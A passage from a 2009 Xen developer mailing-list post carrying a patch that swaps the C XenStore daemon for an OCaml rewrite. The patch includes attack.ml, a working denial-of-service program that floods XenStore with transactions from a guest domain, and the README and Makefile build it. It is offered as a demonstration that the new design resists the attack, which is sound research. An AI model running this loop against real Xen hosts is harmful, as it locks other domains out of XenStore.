From mboxrd@z Thu Jan 1 00:00:00 1970
From: Patrick Colp
Subject: Re: OCaml XenStore
Date: Thu, 15 Jan 2009 16:49:43 -0800
Message-ID: <496FD9A7.1000603@cs.ubc.ca>
References: <49388712.70909@cs.ubc.ca> <493DB45B.2020509@cs.ubc.ca>
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="------------080103040208000401080509"
In-Reply-To: <493DB45B.2020509@cs.ubc.ca>
Sender: xen-devel-bounces@lists.xensource.com
Errors-To: xen-devel-bounces@lists.xensource.com
To: xen-devel@lists.xensource.com
Cc: "Andrew Warfield (cs)"
List-Id: xen-devel@lists.xenproject.org

This is a multi-part message in MIME format.
--------------080103040208000401080509
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit

After receiving some more feedback, I've fixed some more issues with the
build. This patch has been tested against the latest xen-unstable tip
(19043).


Patrick


Patrick Colp wrote:
> A few issues with this release have been brought to my attention. The
> most important is an include file which was linked to a file in my build
> config rather than the system one. The other was the way I was handling
> socket connection shutdown. So I've fixed both of these and created a
> new patch which is against the current xen-unstable tip (18881).
>
> Any additional comments would be greatly appreciated.
>
>
> Patrick
>
>
> Patrick Colp wrote:
>> Hello all,
>>
>> A few months ago I released an OCaml version of XenStore. It was
>> basically just the C version but written in OCaml. Since then I've put a
>> lot of work into it and am ready to release the next version. The code
>> has been cleaned up a lot, modularised, and put into classes.
>>
>> I've improved the transaction system to use optimistic concurrency
>> control with copy-on-write.
>> I found that by repeatedly starting a
>> transaction, writing some data, and committing the transaction from a
>> guest domain, it was possible to create a denial-of-service attack on
>> XenStore (this attack is included in the release). However, this same
>> attack run against this version of the OCaml XenStore does not prevent
>> other transactions from committing.
>>
>> I'm releasing it as a patch against the current tip (18847). It replaces
>> the C XenStore with the OCaml one. A tarball of the OCaml XenStore code
>> is also available on my website at:
>>
>> http://cs.ubc.ca/~pjcolp/xenstore-ocaml.tar.bz2
>>
>>
>> Patrick
>>
>>
>> ------------------------------------------------------------------------
>>
>> _______________________________________________
>> Xen-devel mailing list
>> Xen-devel@lists.xensource.com
>> http://lists.xensource.com/xen-devel
>
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> Xen-devel mailing list
> Xen-devel@lists.xensource.com
> http://lists.xensource.com/xen-devel

--------------080103040208000401080509
Content-Type: text/x-patch;
 name="xenstore-ocaml-1.4.patch"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="xenstore-ocaml-1.4.patch"

diff -r 10a8fae412c5 tools/xenstore/COPYING
--- a/tools/xenstore/COPYING	Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null	Thu Jan 01 00:00:00 1970 +0000
@@ -1,515 +0,0 @@
-This license (LGPL) applies to the xenstore library which interfaces
-with the xenstore daemon (as stated in xs.c, xs.h, xs_lib.c and
-xs_lib.h).  The remaining files in the directory are licensed as
-stated in the comments (as of this writing, GPL, see ../../COPYING).
-
-
-		  GNU LESSER GENERAL PUBLIC LICENSE
-		       Version 2.1, February 1999
-
- Copyright (C) 1991, 1999 Free Software Foundation, Inc.
- 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA - Everyone is permitted to copy and distribute verbatim copies - of this license document, but changing it is not allowed. - -[This is the first released version of the Lesser GPL. It also counts - as the successor of the GNU Library Public License, version 2, hence - the version number 2.1.] - - Preamble - - The licenses for most software are designed to take away your -freedom to share and change it. By contrast, the GNU General Public -Licenses are intended to guarantee your freedom to share and change -free software--to make sure the software is free for all its users. - - This license, the Lesser General Public License, applies to some -specially designated software packages--typically libraries--of the -Free Software Foundation and other authors who decide to use it. You -can use it too, but we suggest you first think carefully about whether -this license or the ordinary General Public License is the better -strategy to use in any particular case, based on the explanations -below. - - When we speak of free software, we are referring to freedom of use, -not price. Our General Public Licenses are designed to make sure that -you have the freedom to distribute copies of free software (and charge -for this service if you wish); that you receive source code or can get -it if you want it; that you can change the software and use pieces of -it in new free programs; and that you are informed that you can do -these things. - - To protect your rights, we need to make restrictions that forbid -distributors to deny you these rights or to ask you to surrender these -rights. These restrictions translate to certain responsibilities for -you if you distribute copies of the library or if you modify it. - - For example, if you distribute copies of the library, whether gratis -or for a fee, you must give the recipients all the rights that we gave -you. You must make sure that they, too, receive or can get the source -code. 
If you link other code with the library, you must provide -complete object files to the recipients, so that they can relink them -with the library after making changes to the library and recompiling -it. And you must show them these terms so they know their rights. - - We protect your rights with a two-step method: (1) we copyright the -library, and (2) we offer you this license, which gives you legal -permission to copy, distribute and/or modify the library. - - To protect each distributor, we want to make it very clear that -there is no warranty for the free library. Also, if the library is -modified by someone else and passed on, the recipients should know -that what they have is not the original version, so that the original -author's reputation will not be affected by problems that might be -introduced by others. - - Finally, software patents pose a constant threat to the existence of -any free program. We wish to make sure that a company cannot -effectively restrict the users of a free program by obtaining a -restrictive license from a patent holder. Therefore, we insist that -any patent license obtained for a version of the library must be -consistent with the full freedom of use specified in this license. - - Most GNU software, including some libraries, is covered by the -ordinary GNU General Public License. This license, the GNU Lesser -General Public License, applies to certain designated libraries, and -is quite different from the ordinary General Public License. We use -this license for certain libraries in order to permit linking those -libraries into non-free programs. - - When a program is linked with a library, whether statically or using -a shared library, the combination of the two is legally speaking a -combined work, a derivative of the original library. The ordinary -General Public License therefore permits such linking only if the -entire combination fits its criteria of freedom. 
The Lesser General -Public License permits more lax criteria for linking other code with -the library. - - We call this license the "Lesser" General Public License because it -does Less to protect the user's freedom than the ordinary General -Public License. It also provides other free software developers Less -of an advantage over competing non-free programs. These disadvantages -are the reason we use the ordinary General Public License for many -libraries. However, the Lesser license provides advantages in certain -special circumstances. - - For example, on rare occasions, there may be a special need to -encourage the widest possible use of a certain library, so that it -becomes a de-facto standard. To achieve this, non-free programs must -be allowed to use the library. A more frequent case is that a free -library does the same job as widely used non-free libraries. In this -case, there is little to gain by limiting the free library to free -software only, so we use the Lesser General Public License. - - In other cases, permission to use a particular library in non-free -programs enables a greater number of people to use a large body of -free software. For example, permission to use the GNU C Library in -non-free programs enables many more people to use the whole GNU -operating system, as well as its variant, the GNU/Linux operating -system. - - Although the Lesser General Public License is Less protective of the -users' freedom, it does ensure that the user of a program that is -linked with the Library has the freedom and the wherewithal to run -that program using a modified version of the Library. - - The precise terms and conditions for copying, distribution and -modification follow. Pay close attention to the difference between a -"work based on the library" and a "work that uses the library". The -former contains code derived from the library, whereas the latter must -be combined with the library in order to run. 
- - GNU LESSER GENERAL PUBLIC LICENSE - TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION - - 0. This License Agreement applies to any software library or other -program which contains a notice placed by the copyright holder or -other authorized party saying it may be distributed under the terms of -this Lesser General Public License (also called "this License"). -Each licensee is addressed as "you". - - A "library" means a collection of software functions and/or data -prepared so as to be conveniently linked with application programs -(which use some of those functions and data) to form executables. - - The "Library", below, refers to any such software library or work -which has been distributed under these terms. A "work based on the -Library" means either the Library or any derivative work under -copyright law: that is to say, a work containing the Library or a -portion of it, either verbatim or with modifications and/or translated -straightforwardly into another language. (Hereinafter, translation is -included without limitation in the term "modification".) - - "Source code" for a work means the preferred form of the work for -making modifications to it. For a library, complete source code means -all the source code for all modules it contains, plus any associated -interface definition files, plus the scripts used to control -compilation and installation of the library. - - Activities other than copying, distribution and modification are not -covered by this License; they are outside its scope. The act of -running a program using the Library is not restricted, and output from -such a program is covered only if its contents constitute a work based -on the Library (independent of the use of the Library in a tool for -writing it). Whether that is true depends on what the Library does -and what the program that uses the Library does. - - 1. 
You may copy and distribute verbatim copies of the Library's -complete source code as you receive it, in any medium, provided that -you conspicuously and appropriately publish on each copy an -appropriate copyright notice and disclaimer of warranty; keep intact -all the notices that refer to this License and to the absence of any -warranty; and distribute a copy of this License along with the -Library. - - You may charge a fee for the physical act of transferring a copy, -and you may at your option offer warranty protection in exchange for a -fee. - - 2. You may modify your copy or copies of the Library or any portion -of it, thus forming a work based on the Library, and copy and -distribute such modifications or work under the terms of Section 1 -above, provided that you also meet all of these conditions: - - a) The modified work must itself be a software library. - - b) You must cause the files modified to carry prominent notices - stating that you changed the files and the date of any change. - - c) You must cause the whole of the work to be licensed at no - charge to all third parties under the terms of this License. - - d) If a facility in the modified Library refers to a function or a - table of data to be supplied by an application program that uses - the facility, other than as an argument passed when the facility - is invoked, then you must make a good faith effort to ensure that, - in the event an application does not supply such function or - table, the facility still operates, and performs whatever part of - its purpose remains meaningful. - - (For example, a function in a library to compute square roots has - a purpose that is entirely well-defined independent of the - application. Therefore, Subsection 2d requires that any - application-supplied function or table used by this function must - be optional: if the application does not supply it, the square - root function must still compute square roots.) 
- -These requirements apply to the modified work as a whole. If -identifiable sections of that work are not derived from the Library, -and can be reasonably considered independent and separate works in -themselves, then this License, and its terms, do not apply to those -sections when you distribute them as separate works. But when you -distribute the same sections as part of a whole which is a work based -on the Library, the distribution of the whole must be on the terms of -this License, whose permissions for other licensees extend to the -entire whole, and thus to each and every part regardless of who wrote -it. - -Thus, it is not the intent of this section to claim rights or contest -your rights to work written entirely by you; rather, the intent is to -exercise the right to control the distribution of derivative or -collective works based on the Library. - -In addition, mere aggregation of another work not based on the Library -with the Library (or with a work based on the Library) on a volume of -a storage or distribution medium does not bring the other work under -the scope of this License. - - 3. You may opt to apply the terms of the ordinary GNU General Public -License instead of this License to a given copy of the Library. To do -this, you must alter all the notices that refer to this License, so -that they refer to the ordinary GNU General Public License, version 2, -instead of to this License. (If a newer version than version 2 of the -ordinary GNU General Public License has appeared, then you can specify -that version instead if you wish.) Do not make any other change in -these notices. - - Once this change is made in a given copy, it is irreversible for -that copy, so the ordinary GNU General Public License applies to all -subsequent copies and derivative works made from that copy. - - This option is useful when you wish to copy part of the code of -the Library into a program that is not a library. - - 4. 
You may copy and distribute the Library (or a portion or -derivative of it, under Section 2) in object code or executable form -under the terms of Sections 1 and 2 above provided that you accompany -it with the complete corresponding machine-readable source code, which -must be distributed under the terms of Sections 1 and 2 above on a -medium customarily used for software interchange. - - If distribution of object code is made by offering access to copy -from a designated place, then offering equivalent access to copy the -source code from the same place satisfies the requirement to -distribute the source code, even though third parties are not -compelled to copy the source along with the object code. - - 5. A program that contains no derivative of any portion of the -Library, but is designed to work with the Library by being compiled or -linked with it, is called a "work that uses the Library". Such a -work, in isolation, is not a derivative work of the Library, and -therefore falls outside the scope of this License. - - However, linking a "work that uses the Library" with the Library -creates an executable that is a derivative of the Library (because it -contains portions of the Library), rather than a "work that uses the -library". The executable is therefore covered by this License. -Section 6 states terms for distribution of such executables. - - When a "work that uses the Library" uses material from a header file -that is part of the Library, the object code for the work may be a -derivative work of the Library even though the source code is not. -Whether this is true is especially significant if the work can be -linked without the Library, or if the work is itself a library. The -threshold for this to be true is not precisely defined by law. 
- - If such an object file uses only numerical parameters, data -structure layouts and accessors, and small macros and small inline -functions (ten lines or less in length), then the use of the object -file is unrestricted, regardless of whether it is legally a derivative -work. (Executables containing this object code plus portions of the -Library will still fall under Section 6.) - - Otherwise, if the work is a derivative of the Library, you may -distribute the object code for the work under the terms of Section 6. -Any executables containing that work also fall under Section 6, -whether or not they are linked directly with the Library itself. - - 6. As an exception to the Sections above, you may also combine or -link a "work that uses the Library" with the Library to produce a -work containing portions of the Library, and distribute that work -under terms of your choice, provided that the terms permit -modification of the work for the customer's own use and reverse -engineering for debugging such modifications. - - You must give prominent notice with each copy of the work that the -Library is used in it and that the Library and its use are covered by -this License. You must supply a copy of this License. If the work -during execution displays copyright notices, you must include the -copyright notice for the Library among them, as well as a reference -directing the user to the copy of this License. Also, you must do one -of these things: - - a) Accompany the work with the complete corresponding - machine-readable source code for the Library including whatever - changes were used in the work (which must be distributed under - Sections 1 and 2 above); and, if the work is an executable linked - with the Library, with the complete machine-readable "work that - uses the Library", as object code and/or source code, so that the - user can modify the Library and then relink to produce a modified - executable containing the modified Library. 
(It is understood - that the user who changes the contents of definitions files in the - Library will not necessarily be able to recompile the application - to use the modified definitions.) - - b) Use a suitable shared library mechanism for linking with the - Library. A suitable mechanism is one that (1) uses at run time a - copy of the library already present on the user's computer system, - rather than copying library functions into the executable, and (2) - will operate properly with a modified version of the library, if - the user installs one, as long as the modified version is - interface-compatible with the version that the work was made with. - - c) Accompany the work with a written offer, valid for at least - three years, to give the same user the materials specified in - Subsection 6a, above, for a charge no more than the cost of - performing this distribution. - - d) If distribution of the work is made by offering access to copy - from a designated place, offer equivalent access to copy the above - specified materials from the same place. - - e) Verify that the user has already received a copy of these - materials or that you have already sent this user a copy. - - For an executable, the required form of the "work that uses the -Library" must include any data and utility programs needed for -reproducing the executable from it. However, as a special exception, -the materials to be distributed need not include anything that is -normally distributed (in either source or binary form) with the major -components (compiler, kernel, and so on) of the operating system on -which the executable runs, unless that component itself accompanies -the executable. - - It may happen that this requirement contradicts the license -restrictions of other proprietary libraries that do not normally -accompany the operating system. Such a contradiction means you cannot -use both them and the Library together in an executable that you -distribute. - - 7. 
You may place library facilities that are a work based on the -Library side-by-side in a single library together with other library -facilities not covered by this License, and distribute such a combined -library, provided that the separate distribution of the work based on -the Library and of the other library facilities is otherwise -permitted, and provided that you do these two things: - - a) Accompany the combined library with a copy of the same work - based on the Library, uncombined with any other library - facilities. This must be distributed under the terms of the - Sections above. - - b) Give prominent notice with the combined library of the fact - that part of it is a work based on the Library, and explaining - where to find the accompanying uncombined form of the same work. - - 8. You may not copy, modify, sublicense, link with, or distribute -the Library except as expressly provided under this License. Any -attempt otherwise to copy, modify, sublicense, link with, or -distribute the Library is void, and will automatically terminate your -rights under this License. However, parties who have received copies, -or rights, from you under this License will not have their licenses -terminated so long as such parties remain in full compliance. - - 9. You are not required to accept this License, since you have not -signed it. However, nothing else grants you permission to modify or -distribute the Library or its derivative works. These actions are -prohibited by law if you do not accept this License. Therefore, by -modifying or distributing the Library (or any work based on the -Library), you indicate your acceptance of this License to do so, and -all its terms and conditions for copying, distributing or modifying -the Library or works based on it. - - 10. 
Each time you redistribute the Library (or any work based on the -Library), the recipient automatically receives a license from the -original licensor to copy, distribute, link with or modify the Library -subject to these terms and conditions. You may not impose any further -restrictions on the recipients' exercise of the rights granted herein. -You are not responsible for enforcing compliance by third parties with -this License. - - 11. If, as a consequence of a court judgment or allegation of patent -infringement or for any other reason (not limited to patent issues), -conditions are imposed on you (whether by court order, agreement or -otherwise) that contradict the conditions of this License, they do not -excuse you from the conditions of this License. If you cannot -distribute so as to satisfy simultaneously your obligations under this -License and any other pertinent obligations, then as a consequence you -may not distribute the Library at all. For example, if a patent -license would not permit royalty-free redistribution of the Library by -all those who receive copies directly or indirectly through you, then -the only way you could satisfy both it and this License would be to -refrain entirely from distribution of the Library. - -If any portion of this section is held invalid or unenforceable under -any particular circumstance, the balance of the section is intended to -apply, and the section as a whole is intended to apply in other -circumstances. - -It is not the purpose of this section to induce you to infringe any -patents or other property right claims or to contest validity of any -such claims; this section has the sole purpose of protecting the -integrity of the free software distribution system which is -implemented by public license practices. 
Many people have made -generous contributions to the wide range of software distributed -through that system in reliance on consistent application of that -system; it is up to the author/donor to decide if he or she is willing -to distribute software through any other system and a licensee cannot -impose that choice. - -This section is intended to make thoroughly clear what is believed to -be a consequence of the rest of this License. - - 12. If the distribution and/or use of the Library is restricted in -certain countries either by patents or by copyrighted interfaces, the -original copyright holder who places the Library under this License -may add an explicit geographical distribution limitation excluding those -countries, so that distribution is permitted only in or among -countries not thus excluded. In such case, this License incorporates -the limitation as if written in the body of this License. - - 13. The Free Software Foundation may publish revised and/or new -versions of the Lesser General Public License from time to time. -Such new versions will be similar in spirit to the present version, -but may differ in detail to address new problems or concerns. - -Each version is given a distinguishing version number. If the Library -specifies a version number of this License which applies to it and -"any later version", you have the option of following the terms and -conditions either of that version or of any later version published by -the Free Software Foundation. If the Library does not specify a -license version number, you may choose any version ever published by -the Free Software Foundation. - - 14. If you wish to incorporate parts of the Library into other free -programs whose distribution conditions are incompatible with these, -write to the author to ask for permission. For software which is -copyrighted by the Free Software Foundation, write to the Free -Software Foundation; we sometimes make exceptions for this. 
Our -decision will be guided by the two goals of preserving the free status -of all derivatives of our free software and of promoting the sharing -and reuse of software generally. - - NO WARRANTY - - 15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO -WARRANTY FOR THE LIBRARY, TO THE EXTENT PERMITTED BY APPLICABLE LAW. -EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR -OTHER PARTIES PROVIDE THE LIBRARY "AS IS" WITHOUT WARRANTY OF ANY -KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE -IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR -PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE -LIBRARY IS WITH YOU. SHOULD THE LIBRARY PROVE DEFECTIVE, YOU ASSUME -THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. - - 16. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN -WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY -AND/OR REDISTRIBUTE THE LIBRARY AS PERMITTED ABOVE, BE LIABLE TO YOU -FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR -CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE -LIBRARY (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING -RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A -FAILURE OF THE LIBRARY TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF -SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH -DAMAGES. - - END OF TERMS AND CONDITIONS - - How to Apply These Terms to Your New Libraries - - If you develop a new library, and you want it to be of the greatest -possible use to the public, we recommend making it free software that -everyone can redistribute and change. You can do so by permitting -redistribution under these terms (or, alternatively, under the terms -of the ordinary General Public License). - - To apply these terms, attach the following notices to the library. 
-It is safest to attach them to the start of each source file to most -effectively convey the exclusion of warranty; and each file should -have at least the "copyright" line and a pointer to where the full -notice is found. - - - - Copyright (C) - - This library is free software; you can redistribute it and/or - modify it under the terms of the GNU Lesser General Public - License as published by the Free Software Foundation; either - version 2.1 of the License, or (at your option) any later version. - - This library is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - Lesser General Public License for more details. - - You should have received a copy of the GNU Lesser General Public - License along with this library; if not, write to the Free Software - Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA - -Also add information on how to contact you by electronic and paper mail. - -You should also get your employer (if you work as a programmer) or -your school, if any, to sign a "copyright disclaimer" for the library, -if necessary. Here is a sample; alter the names: - - Yoyodyne, Inc., hereby disclaims all copyright interest in the - library `Frob' (a library for tweaking knobs) written by James - Random Hacker. - - , 1 April 1990 - Ty Coon, President of Vice - -That's all there is to it! - - diff -r 10a8fae412c5 tools/xenstore/Makefile --- a/tools/xenstore/Makefile Wed Jan 14 13:43:17 2009 +0000 +++ b/tools/xenstore/Makefile Thu Jan 15 15:44:05 2009 -0800 @@ -8,16 +8,55 @@ CFLAGS += -I. CFLAGS += $(CFLAGS_libxenctrl) + +CAMLLIB = $(shell ocamlc -where) +DEF_CPPFLAGS += -I$(CAMLLIB) + +OCAMLFIND=ocamlfind +OCAMLOPT=ocamlopt + + +INCLUDES := -I . 
+OCAML_LIBS := unix.cmxa
+C_LIBS := $(LDFLAGS_libxenctrl) -lpthread -lc
+
+OBJS := constants.cmx utils.cmx eventchan.cmx interface.cmx xenbus.cmx socket.cmx message.cmx connection.cmx dominfo.cmx trace.cmx store.cmx domain.cmx os.cmx option.cmx watch.cmx permission.cmx transaction.cmx xenstored.cmx process.cmx main.cmx
+C_OBJS := xenbus_c.o eventchan_c.o dominfo_c.o main_c.o
+
+ATTACK_OBJS := constants.cmx utils.cmx interface.cmx socket.cmx message.cmx connection.cmx store.cmx attack.cmx
+
+
+# Build rules
+
+.PHONY: all default clean
+
+all: xenstored attack libxenstore.so libxenstore.a clients
+default: all
+
+
+# Source build rules
+
+%.cmx: %.ml
+	$(OCAMLFIND) $(OCAMLOPT) $(INCLUDES) -c $< -o $@
+
+%.o: %.c
+	$(CC) $(CFLAGS) -I$(CAMLLIB) -c $< -o $@
+
+
+# Executable build rules
+
+xenstored: $(OBJS) $(C_OBJS)
+	$(OCAMLFIND) $(OCAMLOPT) -o xenstored $(OCAML_LIBS) $(OBJS) $(C_OBJS) -ccopt '$(CFLAGS)' -cclib '$(C_LIBS)' -cclib '$(LDFLAGS)'
+
+
+attack: $(ATTACK_OBJS)
+	$(OCAMLFIND) $(OCAMLOPT) unix.cmxa -o attack $(ATTACK_OBJS) -ccopt '$(CFLAGS)' -cclib '$(C_LIBS)' -cclib '$(LDFLAGS)'
+
+
 CLIENTS := xenstore-exists xenstore-list xenstore-read xenstore-rm xenstore-chmod
 CLIENTS += xenstore-write xenstore-ls
 
-XENSTORED_OBJS = xenstored_core.o xenstored_watch.o xenstored_domain.o xenstored_transaction.o xs_lib.o talloc.o utils.o tdb.o hashtable.o
-
-XENSTORED_OBJS_$(CONFIG_Linux) = xenstored_linux.o
-XENSTORED_OBJS_$(CONFIG_SunOS) = xenstored_solaris.o xenstored_probes.o
-XENSTORED_OBJS_$(CONFIG_NetBSD) = xenstored_netbsd.o
-
-XENSTORED_OBJS += $(XENSTORED_OBJS_y)
+XENSTORED_OBJS = xs_lib.o
 
 ifneq ($(XENSTORE_STATIC_CLIENTS),y)
 LIBXENSTORE := libxenstore.so
@@ -26,26 +65,10 @@
 xenstore xenstore-control: CFLAGS += -static
 endif
 
-.PHONY: all
-all: libxenstore.so libxenstore.a xenstored clients xs_tdb_dump
 
 .PHONY: clients
 clients: xenstore $(CLIENTS) xenstore-control
 
-ifeq ($(CONFIG_SunOS),y)
-xenstored_probes.h: xenstored_probes.d
-	dtrace -C -h -s xenstored_probes.d
-
-xenstored_solaris.o: xenstored_probes.h - -xenstored_probes.o: xenstored_solaris.o - dtrace -C -G -s xenstored_probes.d xenstored_solaris.o - -CFLAGS += -DHAVE_DTRACE=1 -endif - -xenstored: $(XENSTORED_OBJS) - $(CC) $(CFLAGS) $(LDFLAGS) $^ $(LDFLAGS_libxenctrl) $(SOCKET_LIBS) -o $@ $(CLIENTS): xenstore ln -f xenstore $@ @@ -56,8 +79,6 @@ xenstore-control: xenstore_control.o $(LIBXENSTORE) $(CC) $(CFLAGS) $(LDFLAGS) $< -L. -lxenstore $(SOCKET_LIBS) -o $@ -xs_tdb_dump: xs_tdb_dump.o utils.o tdb.o talloc.o - $(CC) $(CFLAGS) $(LDFLAGS) $^ -o $@ libxenstore.so: libxenstore.so.$(MAJOR) ln -sf $< $@ @@ -72,13 +93,25 @@ libxenstore.a: xs.o xs_lib.o $(AR) rcs $@ $^ + +# Cleaning rules + .PHONY: clean -clean: +clean: clean-xenstored clean-attack clean-xs + +clean-xenstored: + rm -f *.a *.o *.cmx *.cmi xenstored + +clean-attack: + rm -f *.a *.o *.cmx *.cmi attack + +clean-xs: rm -f *.a *.o *.opic *.so* xenstored_probes.h - rm -f xenstored xs_random xs_stress xs_crashme - rm -f xs_tdb_dump xenstore-control + rm -f xs_random xs_stress xs_crashme + rm -f xenstore-control rm -f xenstore $(CLIENTS) - $(RM) $(DEPS) + $(RM) $(DEP) + .PHONY: TAGS TAGS: @@ -88,13 +121,13 @@ tarball: clean cd .. && tar -c -j -v -h -f xenstore.tar.bz2 xenstore/ + +# Install rules + .PHONY: install install: all - $(INSTALL_DIR) $(DESTDIR)/var/run/xenstored - $(INSTALL_DIR) $(DESTDIR)/var/lib/xenstored $(INSTALL_DIR) $(DESTDIR)$(BINDIR) $(INSTALL_DIR) $(DESTDIR)$(SBINDIR) - $(INSTALL_DIR) $(DESTDIR)$(INCLUDEDIR) $(INSTALL_PROG) xenstored $(DESTDIR)$(SBINDIR) $(INSTALL_PROG) xenstore-control $(DESTDIR)$(BINDIR) $(INSTALL_PROG) xenstore $(DESTDIR)/usr/bin @@ -109,6 +142,7 @@ $(INSTALL_DATA) xs.h $(DESTDIR)$(INCLUDEDIR) $(INSTALL_DATA) xs_lib.h $(DESTDIR)$(INCLUDEDIR) + -include $(DEPS) # never delete any intermediate files.
diff -r 10a8fae412c5 tools/xenstore/README --- a/tools/xenstore/README Wed Jan 14 13:43:17 2009 +0000 +++ b/tools/xenstore/README Thu Jan 15 15:44:05 2009 -0800 @@ -1,5 +1,41 @@ -The following files are imported from the Samba project. We use the versions -from Samba 3, the current stable branch. +OCaml XenStore -talloc.c: samba-trunk/source/lib/talloc.c r14291 2006-03-13 04:27:47 +0000 -talloc.h: samba-trunk/source/include/talloc.h r11986 2005-12-01 00:43:36 +0000 + +This is the second version of the OCaml XenStore daemon. It is functionally +equivalent to the C XenStore daemon; however, certain message operations are +unimplemented. These are: DEBUG, RESUME, and SET_TARGET, which I suggested +in the new version of the XenStore protocol are unneeded anyway. + +Due to some broken tools, a hack was added to support values in non-leaf nodes. +This can be found by the Hack type of Node in the Store. Ideally this would be +fixed so that there is no need for the hack. + +The trace and verbose output has been changed slightly to show the domain ID +instead of a hex address. For socket connections, a negative domain ID is used. + +Transactions have been improved to use optimistic concurrency control and +copy-on-write (instead of duplicating the entire store). A denial-of-service +attack has been included in the build. When run against the current version +of XenStore it will prevent any transaction from completing, thus effectively +locking out XenStore. However, using the improved transaction implementation +in the OCaml XenStore, this attack no longer succeeds. + + +The development environment was 32-bit Ubuntu 8.10 with the stock OCaml package +version 3.10.2. It has been tested on Ubuntu 8.04 with the latest version of +xen-unstable and OCaml version 3.10.0.
+ + + +To compile xenstored, the attack, and the libxenstore libraries simply type: + +# make + +To install, type: + +# make install + + +The OCaml XenStore is a drop-in replacement for the original C one and will be +compiled when Xen (or the tools) are built and will be installed on to the +system when Xen is installed. diff -r 10a8fae412c5 tools/xenstore/TODO --- a/tools/xenstore/TODO Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,10 +0,0 @@ -TODO in no particular order. Some of these will never be done. There -are omissions of important but necessary things. It is up to the -reader to fill in the blanks. - -- Timeout failed watch responses -- Dynamic/supply nodes -- Persistant storage of introductions, watches and transactions, so daemon can restart -- Remove assumption that rename doesn't fail -- Multi-root transactions, for setting up front and back ends at same time. - diff -r 10a8fae412c5 tools/xenstore/attack.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/attack.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,78 @@ +let xenbus_dev = "/proc/xen/xenbus";; + +let xenbus_open dev = + Unix.openfile dev [ Unix.O_RDWR ] 0o600;; + +let fd = xenbus_open xenbus_dev;; +let in_set = ref [ fd ];; +let out_set = ref [ fd ];; + +let rec read connection = + let (i, o, _) = Unix.select [ fd ] [ fd ] [] (0.0) in + + in_set := i; + out_set := o; + + if (connection#can_read) then ( + match (connection#read) with + | Some (message) -> message + | None -> read connection; + ) else ( + read connection; + );; + +let get_domain_path connection transaction_id domain_id = + connection#write (Message.make Message.XS_GET_DOMAIN_PATH transaction_id 0l (Utils.null_terminate (string_of_int domain_id))); + Utils.strip_null (read connection).Message.payload;; + +let transaction_start connection = + connection#write (Message.make Message.XS_TRANSACTION_START 0l 0l (Utils.null_terminate Constants.null_string)); + Int32.of_string
(Utils.strip_null (read connection).Message.payload);; + +let transaction_end connection transaction_id = + connection#write (Message.make Message.XS_TRANSACTION_END transaction_id 0l (Utils.null_terminate "T")); + (Utils.strip_null (read connection).Message.payload) = "OK";; + +let write connection transaction_id path value = + connection#write (Message.make Message.XS_WRITE transaction_id 0l ((Utils.null_terminate path) ^ value)); + (Utils.strip_null (read connection).Message.payload) = "OK";; + +let main () = + Printf.printf "Initialising attack...\n"; flush stdout; + + let domain_id = ref 0 + and verbose = ref false in + + (* Parse command-line arguments *) + Arg.parse [ + ("--domid", Arg.Set_int domain_id, " specify ID of this domain"); + ("--verbose", Arg.Set verbose, " specify ID of this domain"); + ] (fun s -> ()) ""; + + let connection = new Connection.connection (new Socket.socket_interface fd true in_set out_set) in + + Printf.printf "Initialised\n"; + Printf.printf "Getting domain path...\n"; flush stdout; + + let domain_path = get_domain_path connection 0l !domain_id in + + Printf.printf "%s\n" domain_path; flush stdout; + + let attack_path = domain_path ^ Store.dividor_str ^ "attack" + and attack_payload = String.make 1024 'a' in + + Printf.printf "Attacking...\n"; flush stdout; + + let rec attack_loop () = ( + let transaction_id = transaction_start connection in + if (write connection transaction_id attack_path attack_payload) then ( + if (transaction_end connection transaction_id) then (attack_loop ()); + ); + ) + in + + attack_loop (); + + Printf.printf "\nDone\n"; flush stdout;; + +main ();; diff -r 10a8fae412c5 tools/xenstore/connection.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/connection.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,95 @@ +(* + Connections for OCaml XenStore Daemon. 
